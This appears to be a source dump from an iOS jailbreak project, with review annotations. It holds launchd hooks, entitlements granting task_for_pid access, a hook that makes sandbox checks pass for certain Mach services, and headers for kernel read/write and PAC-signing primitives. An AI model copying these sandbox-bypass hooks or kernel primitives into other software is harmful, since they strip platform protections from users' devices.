-------------------------------------------------------------------------------- 
/BaseBin/jbinit/entitlements.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | platform-application 6 | 7 | com.apple.private.security.no-container 8 | 9 | task_for_pid-allow 10 | 11 | get-task-allow 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /BaseBin/jbinit/src/launchctl.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | #ifndef launchctl_h 4 | #define launchctl_h 5 | 6 | #if defined(__cplusplus) 7 | extern "C" { 8 | #endif 9 | 10 | extern int64_t launchctl_load(const char* plistPath, bool unload); 11 | 12 | #if defined(__cplusplus) 13 | } 14 | #endif 15 | 16 | #endif /* launchctl_h */ -------------------------------------------------------------------------------- /BaseBin/jbinit/src/launchctl.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import 4 | 5 | #define ROUTINE_LOAD 800 6 | #define ROUTINE_UNLOAD 801 7 | 8 | int64_t launchctl_load(const char* plistPath, bool unload) 9 | { 10 | xpc_object_t pathArray = xpc_array_create_empty(); 11 | xpc_array_set_string(pathArray, XPC_ARRAY_APPEND, plistPath); 12 | 13 | xpc_object_t msgDictionary = xpc_dictionary_create_empty(); 14 | xpc_dictionary_set_uint64(msgDictionary, "subsystem", 3); 15 | xpc_dictionary_set_uint64(msgDictionary, "handle", 0); 16 | xpc_dictionary_set_uint64(msgDictionary, "type", 1); 17 | xpc_dictionary_set_bool(msgDictionary, "legacy-load", true); 18 | xpc_dictionary_set_bool(msgDictionary, "enable", false); 19 | xpc_dictionary_set_uint64(msgDictionary, "routine", unload ? 
ROUTINE_UNLOAD : ROUTINE_LOAD); 20 | xpc_dictionary_set_value(msgDictionary, "paths", pathArray); 21 | 22 | xpc_object_t msgReply = launchd_xpc_send_message(msgDictionary); 23 | 24 | char *msgReplyDescription = xpc_copy_description(msgReply); 25 | printf("msgReply = %s\n", msgReplyDescription); 26 | free(msgReplyDescription); 27 | 28 | int64_t bootstrapError = xpc_dictionary_get_int64(msgReply, "bootstrap-error"); 29 | if(bootstrapError != 0) 30 | { 31 | printf("bootstrap-error = %s\n", xpc_strerror((int32_t)bootstrapError)); 32 | return bootstrapError; 33 | } 34 | 35 | int64_t error = xpc_dictionary_get_int64(msgReply, "error"); 36 | if(error != 0) 37 | { 38 | printf("error = %s\n", xpc_strerror((int32_t)error)); 39 | return error; 40 | } 41 | 42 | // launchctl seems to do extra things here 43 | // like getting the audit token via xpc_dictionary_get_audit_token 44 | // or sometimes also getting msgReply["req_pid"] and msgReply["rec_execcnt"] 45 | // but we don't really care about that here 46 | 47 | return 0; 48 | } 49 | -------------------------------------------------------------------------------- /BaseBin/jbinit/src/main.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import 4 | #import "launchctl.h" 5 | 6 | int main(int argc, char* argv[]) 7 | { 8 | NSString *idownloaddEnabledPath = jbrootPath(@"/basebin/LaunchDaemons/com.opa334.idownloadd.plist"); 9 | NSString *idownloaddDisabledPath = jbrootPath(@"/basebin/LaunchDaemons/Disabled/com.opa334.idownloadd.plist"); 10 | if (argc == 2) { 11 | char *cmd = argv[1]; 12 | if (!strcmp(cmd, "start_idownload")) { 13 | if ([[NSFileManager defaultManager] fileExistsAtPath:idownloaddDisabledPath]) { 14 | [[NSFileManager defaultManager] moveItemAtPath:idownloaddDisabledPath toPath:idownloaddEnabledPath error:nil]; 15 | launchctl_load(idownloaddEnabledPath.fileSystemRepresentation, false); 16 | } 17 | return 0; 18 | } 19 | else if (!strcmp(cmd, 
"stop_idownload")) { 20 | if ([[NSFileManager defaultManager] fileExistsAtPath:idownloaddEnabledPath]) { 21 | launchctl_load(idownloaddEnabledPath.fileSystemRepresentation, true); 22 | [[NSFileManager defaultManager] moveItemAtPath:idownloaddEnabledPath toPath:idownloaddDisabledPath error:nil]; 23 | } 24 | return 0; 25 | } 26 | } 27 | launchctl_load(jbrootPath(@"/basebin/LaunchDaemons/com.opa334.jailbreakd.plist").fileSystemRepresentation, false); 28 | launchctl_load(jbrootPath(@"/basebin/LaunchDaemons/com.opa334.trustcache_rebuild.plist").fileSystemRepresentation, false); 29 | } -------------------------------------------------------------------------------- /BaseBin/launchdhook/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = launchdhook.dylib 2 | CC = clang 3 | 4 | CFLAGS = -Werror -framework Foundation -framework CoreServices -framework Security -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -fobjc-arc -O2 5 | LDFLAGS = -dynamiclib -rpath @loader_path/fallback -L../libjailbreak -L../_shared -ljailbreak -lellekit -lbsm -L../libfilecom -lfilecom 6 | 7 | sign: $(TARGET) 8 | @ldid -S $^ 9 | 10 | $(TARGET): $(wildcard src/*.m ../systemhook/src/common.c ../systemhook/src/envbuf.c) 11 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 12 | 13 | clean: 14 | @rm -f $(TARGET) -------------------------------------------------------------------------------- /BaseBin/launchdhook/src/boomerang.h: -------------------------------------------------------------------------------- 1 | void boomerang_userspaceRebootIncoming(); -------------------------------------------------------------------------------- /BaseBin/launchdhook/src/boomerang.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import 4 | #import 5 | #import 6 | #import 7 | 8 | extern int (*posix_spawn_orig)(pid_t *restrict, const char *restrict, 
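const posix_spawn_file_actions_t *restrict, const posix_spawnattr_t *restrict, char *const[restrict], char *const[restrict]);

/*
 * Start the boomerang helper and block until it reports that its primitives
 * are initialized.
 *
 * Requests from the helper arrive through an FCHandler backed by the two files
 * under /var/.communication inside the jailbreak root and are served by the
 * receive handler below. Returns early, without waiting, if the helper cannot
 * be spawned.
 *
 * NOTE(review): the wait has no timeout, so this call never returns if the
 * helper exits before sending "primitivesInitialized".
 */
void boomerang_userspaceRebootIncoming()
{
	// Fix Xcode debugging being broken after the userspace reboot
	// int retval = unmount("/Developer", MNT_FORCE);
	// JBLogDebug("unmount /Developer : %d %d,%s", retval, errno, strerror(errno));

	pid_t boomerangPid = 0;

	// Wait until boomerang process has initialized primitives
	dispatch_semaphore_t sema = dispatch_semaphore_create(0);
	FCHandler *handler = [[FCHandler alloc] initWithReceiveFilePath:jbrootPath(@"/var/.communication/boomerang_to_launchd") sendFilePath:jbrootPath(@"/var/.communication/launchd_to_boomerang")];
	__weak FCHandler *weakHandler = handler;
	handler.receiveHandler = ^(NSDictionary *message) {
		// The message is decoded from a file, so its shape is not guaranteed.
		// Messaging a value of the wrong class raises an exception in this
		// process; malformed messages are dropped instead.
		if (![message isKindOfClass:[NSDictionary class]]) return;
		NSString *identifier = message[@"id"];
		if (![identifier isKindOfClass:[NSString class]]) return;

		if ([identifier isEqualToString:@"getPPLRW"]) {
			NSNumber *pidValue = message[@"pid"];
			if (![pidValue isKindOfClass:[NSNumber class]]) {
				JBLogDebug("getPPLRW without a numeric pid, ignoring");
				return;
			}
			// NOTE(review): the pid is taken from the message as-is, so whoever can
			// write the receive file chooses which process gets the handoff.
			// Consider comparing it with the pid returned by posix_spawn_orig, and
			// confirm the permissions on the communication directory.
			pid_t pid = [pidValue intValue];
			int ret = handoffPPLPrimitives(pid);
			[weakHandler sendMessage:@{@"id" : @"receivePPLRW", @"errCode" : @(ret)}];
		}
		else if ([identifier isEqualToString:@"signThreadState"]) {
			NSNumber *actContextValue = message[@"actContext"];
			if (![actContextValue isKindOfClass:[NSNumber class]]) {
				JBLogDebug("signThreadState without a numeric actContext, ignoring");
				return;
			}
			// NOTE(review): this pointer value also comes straight from the message
			// and is not validated here before it is handed to signState().
			uint64_t actContextKptr = [actContextValue unsignedLongLongValue];
			signState(actContextKptr);
			[weakHandler sendMessage:@{@"id" : @"signedThreadState"}];
		}
		else if ([identifier isEqualToString:@"primitivesInitialized"])
		{
			dispatch_semaphore_signal(sema); // DONE, exit
		}
	};

	int ret = posix_spawn_orig(&boomerangPid, jbrootPath(@"/basebin/boomerang").fileSystemRepresentation, NULL, NULL, NULL, NULL);
	if (ret != 0) return;

	JBLogDebug("boomerangPid=%d", boomerangPid);

	dispatch_semaphore_wait(sema, DISPATCH_TIME_FOREVER);
}

--------------------------------------------------------------------------------
/BaseBin/launchdhook/src/crashreporter.h: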
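--------------------------------------------------------------------------------
#import
#include

typedef int exception_type_t;
typedef integer_t exception_data_type_t;

// Layout of the incoming exception message; only the leading fields are declared.
#pragma pack(4)
typedef struct {
    mach_msg_header_t header;
    mach_msg_body_t msgh_body;
    mach_msg_port_descriptor_t thread;
    mach_msg_port_descriptor_t task;
    int unused1;
    exception_type_t exception;
    exception_data_type_t code;
    int unused2;
    int subcode;
    NDR_record_t ndr;
} exception_raise_request; // the bits we need at least
#pragma pack()

#pragma pack(4)
typedef struct {
    mach_msg_header_t header;
    NDR_record_t ndr;
    kern_return_t retcode;
} exception_raise_reply;
#pragma pack()

#pragma pack(4)
typedef struct {
    mach_msg_header_t header;
    NDR_record_t ndr;
    kern_return_t retcode;
    int flavor;
    mach_msg_type_number_t new_stateCnt;
    natural_t new_state[614];
} exception_raise_state_reply;
#pragma pack()

typedef enum {
    kCrashReporterStateNotActive = 0,
    kCrashReporterStateActive = 1,
    kCrashReporterStatePaused = 2
} crash_reporter_state;

void crashreporter_start(void);
void crashreporter_pause(void);
void crashreporter_resume(void);

FILE *crashreporter_open_outfile(const char *source, char **nameOut);
void crashreporter_save_outfile(FILE *f);
--------------------------------------------------------------------------------
/BaseBin/launchdhook/src/daemon_hook.h:
--------------------------------------------------------------------------------
void initDaemonHooks(void);
--------------------------------------------------------------------------------
/BaseBin/launchdhook/src/daemon_hook.m:
--------------------------------------------------------------------------------
#import
#import
#import
#import
#import "substrate.h"
#import
#import
#import
#import

extern xpc_object_t xpc_create_from_plist(const void *buf, size_t len);

/*
 * Parse the plist at `path` and store the resulting XPC object in `xdict`
 * under the key `path`.
 *
 * Silently does nothing when either argument is NULL, the file cannot be
 * opened or stat'ed, the file is empty, the mapping fails, or the plist does
 * not parse. The plist content is taken as-is: whoever can write to `path`
 * decides what ends up in `xdict`.
 */
void addLaunchDaemon(xpc_object_t xdict, const char *path)
{
    if (!xdict || !path) {
        return;
    }

    int ldFd = open(path, O_RDONLY);
    if (ldFd < 0) {
        return;
    }

    struct stat s = {};
    // A zero-length file cannot be mapped and cannot hold a plist.
    if (fstat(ldFd, &s) != 0 || s.st_size <= 0) {
        close(ldFd);
        return;
    }

    size_t len = (size_t)s.st_size;
    void *addr = mmap(NULL, len, PROT_READ, MAP_FILE | MAP_PRIVATE, ldFd, 0);
    // mmap reports failure with MAP_FAILED, not NULL; a NULL test would let
    // the failure value reach xpc_create_from_plist and munmap.
    if (addr != MAP_FAILED) {
        xpc_object_t daemonXdict = xpc_create_from_plist(addr, len);
        if (daemonXdict) {
            xpc_dictionary_set_value(xdict, path, daemonXdict);
        }
        munmap(addr, len);
    }
    close(ldFd);
}

xpc_object_t (*xpc_dictionary_get_value_orig)(xpc_object_t xdict, const char *key);

/*
 * Replacement for xpc_dictionary_get_value.
 *
 * Calls the original, then, for the keys "LaunchDaemons" and "Paths", adds the
 * basebin launch daemon plists / directory to the returned container before
 * handing it back. The match is on the key name alone, so every dictionary
 * queried with one of these keys in the hooked process is affected.
 */
xpc_object_t xpc_dictionary_get_value_hook(xpc_object_t xdict, const char *key)
{
    xpc_object_t orgValue = xpc_dictionary_get_value_orig(xdict, key);
    // Nothing to extend when the lookup failed; strcmp on a NULL key would crash.
    if (!key || !orgValue) {
        return orgValue;
    }

    if (!strcmp(key, "LaunchDaemons")) {
        // Only mutate the value when it really is a dictionary.
        if (xpc_get_type(orgValue) == XPC_TYPE_DICTIONARY) {
            addLaunchDaemon(orgValue, jbrootPath(@"/basebin/LaunchDaemons/com.opa334.jailbreakd.plist").fileSystemRepresentation);
            addLaunchDaemon(orgValue, jbrootPath(@"/basebin/LaunchDaemons/com.opa334.trustcache_rebuild.plist").fileSystemRepresentation);
            // for (NSString *daemonPlistName in [[NSFileManager defaultManager] contentsOfDirectoryAtPath:jbrootPath(@"/Library/LaunchDaemons") error:nil]) {
            //     if ([daemonPlistName.pathExtension isEqualToString:@"plist"]) {
            //         addLaunchDaemon(orgValue, [jbrootPath(@"/Library/LaunchDaemons") stringByAppendingPathComponent:daemonPlistName].fileSystemRepresentation);
            //     }
            // }
        }
    }
    else if (!strcmp(key, "Paths")) {
        // Only append when the value really is an array.
        if (xpc_get_type(orgValue) == XPC_TYPE_ARRAY) {
            xpc_array_set_string(orgValue, XPC_ARRAY_APPEND, jbrootPath(@"/basebin/LaunchDaemons").fileSystemRepresentation);
            //xpc_array_set_string(orgValue, XPC_ARRAY_APPEND, jbrootPath(@"/Library/LaunchDaemons").fileSystemRepresentation);
        }
    }
    return orgValue;
}

// Install the xpc_dictionary_get_value hook.
void initDaemonHooks(void)
{
    MSHookFunction(&xpc_dictionary_get_value, (void *)xpc_dictionary_get_value_hook, (void **)&xpc_dictionary_get_value_orig);
}
--------------------------------------------------------------------------------
/BaseBin/launchdhook/src/ipc_hook.h:
--------------------------------------------------------------------------------
void initIPCHooks(void);
--------------------------------------------------------------------------------
/BaseBin/launchdhook/src/ipc_hook.m:
--------------------------------------------------------------------------------
#import
#import
#import
#import
#import "substrate.h"

/* csops operations */
#define CS_OPS_STATUS 0 /* return status */
#define CS_PLATFORM_BINARY 0x04000000 /* this is a platform binary */
int csops(pid_t pid, unsigned int ops, void * useraddr, size_t usersize);

NSString* getAppIdentifierForPath(const char* path);
BOOL roothideBlacklistedApp(NSString* identifier);

int (*sandbox_check_by_audit_token_orig)(audit_token_t au, const char *operation, int sandbox_filter_type, ...);

/*
 * Replacement for sandbox_check_by_audit_token.
 *
 * Returns 0 (allowed) without consulting the real sandbox for "mach-lookup"
 * requests whose service name starts with "cy:" or "lh:", unless the caller
 * runs as uid 501, is not a platform binary and its app identifier is
 * blacklisted. Every other request is forwarded to the original function.
 *
 * Review notes:
 *  - The exemption is a pure prefix match: any service registered under one
 *    of these prefixes becomes reachable from every non-blacklisted process,
 *    sandboxed or not.
 *  - The caller is identified through the pid taken from the audit token
 *    (csops / proc_pidpath by pid). A pid can be reused between the request
 *    and these lookups; keying on the audit token itself (csops_audittoken)
 *    would close that window. NOTE(review): confirm availability in this
 *    build before switching.
 *  - When csops fails, csFlags stays 0 and the caller is treated as a
 *    non-platform binary, i.e. the blacklist is still consulted.
 */
int sandbox_check_by_audit_token_hook(audit_token_t au, const char *operation, int sandbox_filter_type, ...)
{
    // Ten pointer-sized variadic slots are read unconditionally so they can be
    // forwarded unchanged; how many are meaningful depends on
    // sandbox_filter_type, which this hook does not interpret.
    va_list a;
    va_start(a, sandbox_filter_type);
    const char *name = va_arg(a, const char *);
    const void *arg2 = va_arg(a, void *);
    const void *arg3 = va_arg(a, void *);
    const void *arg4 = va_arg(a, void *);
    const void *arg5 = va_arg(a, void *);
    const void *arg6 = va_arg(a, void *);
    const void *arg7 = va_arg(a, void *);
    const void *arg8 = va_arg(a, void *);
    const void *arg9 = va_arg(a, void *);
    const void *arg10 = va_arg(a, void *);
    va_end(a);

    // The caller lookups below only matter when the request would otherwise be
    // short-circuited, so they are skipped for every other sandbox check.
    if (name && operation
        && strcmp(operation, "mach-lookup") == 0
        && (strncmp(name, "cy:", 3) == 0 || strncmp(name, "lh:", 3) == 0)) {
        bool allow = true;

        pid_t pid = audit_token_to_pid(au);
        uid_t uid = audit_token_to_euid(au);

        uint32_t csFlags = 0;
        csops(pid, CS_OPS_STATUS, &csFlags, sizeof(csFlags));

        if (uid == 501 && (csFlags & CS_PLATFORM_BINARY) == 0) {
            char pathbuf[4*MAXPATHLEN] = {0};
            if (pid > 0 && proc_pidpath(pid, pathbuf, sizeof(pathbuf)) > 0) {
                NSString *appIdentifier = getAppIdentifierForPath(pathbuf);
                if (appIdentifier && roothideBlacklistedApp(appIdentifier)) {
                    JBLogDebug("sandbox_check_by_audit_token operation=%s name=%s from %s", operation, name, pathbuf);
                    allow = false;
                }
            }
        }

        if (allow) {
            return 0;
        }
    }
    return sandbox_check_by_audit_token_orig(au, operation, sandbox_filter_type, name, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10);
}

// Install the sandbox_check_by_audit_token hook.
void initIPCHooks(void)
{
    MSHookFunction(&sandbox_check_by_audit_token, (void *)sandbox_check_by_audit_token_hook, (void **)&sandbox_check_by_audit_token_orig);
}
--------------------------------------------------------------------------------
/BaseBin/launchdhook/src/spawn_hook.h: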
--------------------------------------------------------------------------------
void initSpawnHooks(void);
--------------------------------------------------------------------------------
/BaseBin/launchdhook/src/xpc_hook.h:
--------------------------------------------------------------------------------
void initXPCHooks(void);
--------------------------------------------------------------------------------
/BaseBin/libfilecom/Makefile:
--------------------------------------------------------------------------------
TARGET = libfilecom.dylib

CC = clang

CFLAGS = -Werror -framework Foundation -framework CoreServices -framework Security -framework IOKit -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -fobjc-arc -Wno-nullability-completeness-on-arrays -dynamiclib -install_name @loader_path/$(TARGET) -O2

sign: $(TARGET)
	@ldid -S $<

$(TARGET): $(wildcard src/*.m)
	$(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^

clean:
	@rm -f $(TARGET)
--------------------------------------------------------------------------------
/BaseBin/libfilecom/src/FCHandler.h:
--------------------------------------------------------------------------------
#import

// Message handler built around one receive file path and one send file path.
@interface FCHandler : NSObject
{
    NSString *_receiveFilePath;
    NSString *_sendFilePath;
    int _receiveFd;
    dispatch_source_t _dispatchSource;
    dispatch_queue_t _sendQueue;
    dispatch_queue_t _receiveQueue;
    BOOL _ignoreIncoming;
}

// Block invoked with each received message dictionary.
@property (nonatomic, copy) void (^receiveHandler)(NSDictionary *);

- (instancetype)initWithReceiveFilePath:(NSString *)receiveFilePath sendFilePath:(NSString *)sendFilePath;

- (BOOL)sendMessage:(NSDictionary *)message;
- (void)receivedMessage:(NSDictionary *)message;


@end
--------------------------------------------------------------------------------
/BaseBin/libintl.8.dylib:
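--------------------------------------------------------------------------------
https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/BaseBin/libintl.8.dylib
--------------------------------------------------------------------------------
/BaseBin/libjailbreak/Makefile:
--------------------------------------------------------------------------------
TARGET = libjailbreak.dylib

CC = clang

CFLAGS = -Werror -framework Foundation -framework CoreServices -framework Security -framework IOKit -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -fobjc-arc -Wno-nullability-completeness-on-arrays -dynamiclib -install_name @loader_path/$(TARGET) -O3
LDFLAGS = -lbsm -L../libfilecom -lfilecom -L../ChOma/output/ios/lib/ -lchoma

sign: $(TARGET)
	@ldid -S $<

$(TARGET): $(wildcard src/*.m src/*.c src/*.S)
	$(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^

clean:
	@rm -f $(TARGET)
--------------------------------------------------------------------------------
/BaseBin/libjailbreak/src/RemoteLog.h:
--------------------------------------------------------------------------------
#ifndef _REMOTE_LOG_H_
#define _REMOTE_LOG_H_

#import
#import
#import
#import
#include
#include

// change this to match your destination (server) IP address
// With the default broadcast address every message is sent unencrypted and
// unauthenticated to the whole local network segment: any host on it can read
// the log text. Use a specific collector address and keep this header out of
// release builds.
#define RLOG_IP_ADDRESS "255.255.255.255"
#define RLOG_PORT 11909

// NOTE(review): these are definitions, not declarations; two translation units
// including this header in one image would define the same symbols twice.
int sd=0;
struct sockaddr_in broadcastAddr={0};

/*
 * Format `format`/`args` and send the result as one UDP datagram to
 * RLOG_IP_ADDRESS:RLOG_PORT. A socket is opened and closed on every call.
 * Failures are reported on stdout and otherwise ignored.
 */
__attribute__((unused)) static void RLogv(NSString* format, va_list args)
{
    if (!format) {
        return;
    }
    NSString* str = [[NSString alloc] initWithFormat:format arguments:args];

    //static int inited=0;
    //if(inited==0)
    {
        //inited=1;
        printf("[RemoteLog] init\n");

        sd = socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP);
        // socket() signals failure with -1; 0 is a valid descriptor.
        if (sd < 0)
        {
            printf("[RemoteLog] Error: Could not open socket\n");
            return;
        }

        int broadcastEnable = 1;
        int optResult = setsockopt(sd, SOL_SOCKET, SO_BROADCAST, &broadcastEnable, sizeof(broadcastEnable));
        if (optResult)
        {
            printf("[RemoteLog] Error: Could not open set socket to broadcast mode\n");
            close(sd);
            return;
        }

        // int sendbufsize = 1024*1024*5; //max on ios
        // ret = setsockopt(sd, SOL_SOCKET, SO_SNDBUF, &sendbufsize, sizeof(sendbufsize));
        // if (ret)
        // {
        //     printf("[RemoteLog] Error: Could not set sock buf size, %d, %s\n", errno, strerror(errno));
        //     close(sd);
        //     return;
        // }

        memset(&broadcastAddr, 0, sizeof broadcastAddr);
        broadcastAddr.sin_family = AF_INET;
        inet_pton(AF_INET, RLOG_IP_ADDRESS, &broadcastAddr.sin_addr);
        broadcastAddr.sin_port = htons(RLOG_PORT);
    }

    const char* request = [str UTF8String];
    if (request)
    {
        ssize_t sent = sendto(sd, request, strlen(request), 0, (struct sockaddr*)&broadcastAddr, sizeof broadcastAddr);
        if (sent < 0)
        {
            printf("[RemoteLog] Error: Could not send broadcast, %d, %s\n", errno, strerror(errno));
        }
    }

    // Close on every path: the socket is re-created per call, so returning
    // without closing after a failed send would leak one descriptor each time.
    close(sd);

    //printf("send %s\n", request);
}

// Variadic front end for RLogv.
__attribute__((unused)) static void RLog(NSString* format, ...)
{
    va_list args;
    va_start(args, format);
    RLogv(format, args);
    va_end(args);
}


#endif

--------------------------------------------------------------------------------
/BaseBin/libjailbreak/src/boot_info.h:
--------------------------------------------------------------------------------
__kindof NSObject *bootInfo_getObject(NSString *name);
void bootInfo_setObject(NSString *name, __kindof NSObject *object);

uint64_t bootInfo_getUInt64(NSString *name);
uint64_t bootInfo_getSlidUInt64(NSString *name);
NSData *bootInfo_getData(NSString *name);
NSArray *bootInfo_getArray(NSString *name);

--------------------------------------------------------------------------------
/BaseBin/libjailbreak/src/boot_info.m:
--------------------------------------------------------------------------------
#import
#import "util.h"

// The values stored in this plist are later combined with the kernel slide
// (see bootInfo_getSlidUInt64). They are type-checked on read but not
// range-checked, so the file's ownership and permissions are what protect
// them. NOTE(review): confirm who can write this path.
#define BOOT_INFO_PATH jbrootPath(@"/var/.boot_info.plist")

/*
 * Store `object` under `name` in the boot info plist, or remove the entry when
 * `object` is nil. The whole plist is read, modified and written back
 * atomically; the result of the write is not reported to the caller.
 */
void bootInfo_setObject(NSString *name, __kindof NSObject *object)
{
    // A nil key raises an exception in NSMutableDictionary.
    if (!name) {
        return;
    }

    NSURL *bootInfoURL = [NSURL fileURLWithPath:BOOT_INFO_PATH isDirectory:NO];
    NSMutableDictionary *bootInfo = [NSDictionary dictionaryWithContentsOfURL:bootInfoURL error:nil].mutableCopy ?: [NSMutableDictionary new];
    if (object) {
        bootInfo[name] = object;
    }
    else {
        [bootInfo removeObjectForKey:name];
    }
    [bootInfo writeToURL:bootInfoURL atomically:YES];
}

// Return the object stored under `name`, or nil when the plist or the key is missing.
__kindof NSObject *bootInfo_getObject(NSString *name)
{
    NSURL *bootInfoURL = [NSURL fileURLWithPath:BOOT_INFO_PATH isDirectory:NO];
    NSDictionary *bootInfo = [NSDictionary dictionaryWithContentsOfURL:bootInfoURL error:nil];
    return bootInfo[name];
}

// Return the entry as an unsigned 64-bit value, or 0 when it is missing or not an NSNumber.
uint64_t bootInfo_getUInt64(NSString *name)
{
    NSNumber* num = bootInfo_getObject(name);
    if ([num isKindOfClass:NSNumber.class])
    {
        return num.unsignedLongLongValue;
    }
    return 0;
}

// Return the entry plus the stored "kernelslide". A missing entry reads as 0,
// so the result is then the bare slide; callers cannot tell the two apart.
uint64_t bootInfo_getSlidUInt64(NSString *name)
{
    uint64_t kernelslide = bootInfo_getUInt64(@"kernelslide");
    return bootInfo_getUInt64(name) + kernelslide;
}

// Return the entry when it is an NSData, else nil.
NSData *bootInfo_getData(NSString *name)
{
    NSData* data = bootInfo_getObject(name);
    if ([data isKindOfClass:NSData.class])
    {
        return data;
    }
    return nil;
}

// Return the entry when it is an NSArray, else nil.
NSArray *bootInfo_getArray(NSString *name)
{
    NSArray* array = bootInfo_getObject(name);
    if ([array isKindOfClass:NSArray.class])
    {
        return array;
    }
    return nil;
}
--------------------------------------------------------------------------------
/BaseBin/libjailbreak/src/handoff.h:
--------------------------------------------------------------------------------
int handoffPPLPrimitives(pid_t pid);

--------------------------------------------------------------------------------
/BaseBin/libjailbreak/src/jailbreakd.h:
--------------------------------------------------------------------------------
#import
#import

typedef enum {
    JBD_MSG_GET_STATUS = 0,
    JBD_MSG_PPL_INIT = 1,
    JBD_MSG_PAC_INIT = 2,
    JBD_MSG_PAC_FINALIZE = 3,

    JBD_MSG_HANDOFF_PPL = 10,
    JBD_MSG_DO_KCALL = 11,
    JBD_MSG_DO_KCALL_THREADSTATE = 12,
    JBD_MSG_INIT_ENVIRONMENT = 13,
    JBD_MSG_JBUPDATE = 14,

    JBD_MSG_REBUILD_TRUSTCACHE = 20,
    JBD_MSG_SETUID_FIX = 21,
    JBD_MSG_PROCESS_BINARY = 22,
    JBD_MSG_PROC_SET_DEBUGGED = 23,
    JBD_MSG_DEBUG_ME = 24,
    JBD_MSG_FORK_FIX = 25,
    JBD_MSG_INTERCEPT_USERSPACE_PANIC = 26,

    JBD_SET_FAKELIB_VISIBLE = 30,


    JBD_MSG_REBOOT_USERSPACE = 1000,
    JBD_MSG_PATCH_SPAWN = 1001,
    JBD_MSG_PATCH_EXEC_ADD = 1002,
    JBD_MSG_PATCH_EXEC_DEL = 1003,

} JBD_MESSAGE_ID;

typedef enum {
    JBD_ERR_PRIMITIVE_NOT_INITIALIZED = 0,
    JBD_ERR_NOT_PERMITTED = 1,
} JBD_ERR_ID;

typedef struct {
    uint64_t x[29];
    uint64_t lr;
    uint64_t sp;
    uint64_t pc;
} KcallThreadState;

extern bool gIsJailbreakd;

uint64_t jbdParseNumUInt64(NSNumber *num);
uint64_t jbdParseNumInt64(NSNumber *num);
bool jbdParseBool(NSNumber *num);

mach_port_t jbdMachPort(void);
xpc_object_t sendJBDMessage(xpc_object_t message);

void jbdGetStatus(uint64_t *PPLRWStatus, uint64_t *kcallStatus, pid_t *pid);
void jbdTransferPPLRW(void);
uint64_t jbdTransferKcall();
void jbdFinalizeKcall(void);

uint64_t jbdGetPPLRWPage(int64_t* errOut);
int jbdInitPPLRW(void);
uint64_t jbdKcallThreadState(KcallThreadState *threadState, bool raw);
uint64_t jbdKcall(uint64_t func, uint64_t argc, const uint64_t *argv);
uint64_t jbdKcall8(uint64_t func, uint64_t a1, uint64_t a2, uint64_t a3, uint64_t a4, uint64_t a5, uint64_t a6, uint64_t a7, uint64_t a8);
int64_t jbdInitEnvironment(void);

int64_t jbdUpdateFromTIPA(NSString *pathToTIPA, bool rebootWhenDone);
int64_t jbdUpdateFromBasebinTar(NSString *pathToBasebinTar, bool rebootWhenDone);

int64_t jbdRebuildTrustCache(void);
int64_t jbdProcessBinary(const char *filePath);
int64_t jbdProcSetDebugged(pid_t pid);

int64_t jbdRebootUserspace(void);

--------------------------------------------------------------------------------
/BaseBin/libjailbreak/src/kcall.h:
--------------------------------------------------------------------------------
#import
#import "jailbreakd.h"

typedef enum {
    kKcallStatusNotInitialized = 0,
    kKcallStatusPrepared = 1,
    kKcallStatusFinalized = 2
} KcallStatus;

typedef struct {
    uint64_t unk; //??arm_state_hdr_t ash{uint32_t flavor;uint32_t count;}
    uint64_t x[29];
    uint64_t fp;
    uint64_t lr;
    uint64_t sp;
    uint64_t pc;
    uint32_t cpsr;
    // Other stuff
    uint64_t other[70];
} kRegisterState; //size=0x348, but ARM_CONTEXT_SIZE=0x350

struct arm_kernel_saved_state {
    uint64_t x[10]; /* General purpose registers x19-x28 */
    uint64_t fp; /* Frame pointer x29 */
    uint64_t lr; /* Link register x30 */ // RETAA via cswitch_epilogue
    uint64_t sp; /* Stack pointer x31 */ // important!
    uint64_t pc; /* Program counter */ // always zero
} __attribute__((aligned(16)));

extern KcallStatus gKCallStatus;

void pac_loop(void);

uint64_t kcall(uint64_t func, uint64_t argc, const uint64_t *argv);
uint64_t kcall8(uint64_t func, uint64_t a1, uint64_t a2, uint64_t a3, uint64_t a4, uint64_t a5, uint64_t a6, uint64_t a7, uint64_t a8);
uint64_t kcall_with_raw_thread_state(KcallThreadState threadState);
uint64_t kcall_with_thread_state(KcallThreadState threadState);
uint64_t initPACPrimitives(uint64_t kernelAllocation);
void finalizePACPrimitives(void);
int signState(uint64_t actContext);
int recoverPACPrimitives();
void destroyPACPrimitives(void);
--------------------------------------------------------------------------------
/BaseBin/libjailbreak/src/launchd.h:
--------------------------------------------------------------------------------
#import
xpc_object_t launchd_xpc_send_message(xpc_object_t xdict);

typedef enum {
    LAUNCHD_JB_MSG_ID_GET_PPLRW,
    LAUNCHD_JB_MSG_ID_SIGN_STATE
} LAUNCHD_JB_MSG;

void patchBaseBinLaunchDaemonPlist(NSString *plistPath);
void patchBaseBinLaunchDaemonPlists(void);
--------------------------------------------------------------------------------
/BaseBin/libjailbreak/src/libjailbreak.h:
--------------------------------------------------------------------------------
#import "boot_info.h"
#import "handoff.h"
#import "jailbreakd.h"
#import "pplrw.h"
#import "pte.h"
#import "kcall.h"
#import "util.h"
#import "log.h"
--------------------------------------------------------------------------------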
/BaseBin/libjailbreak/src/log.h:
--------------------------------------------------------------------------------
//#define ENABLE_LOGS

// With ENABLE_LOGS undefined (the state shown here) both log calls expand to
// nothing, so their arguments are never evaluated.
#ifdef ENABLE_LOGS
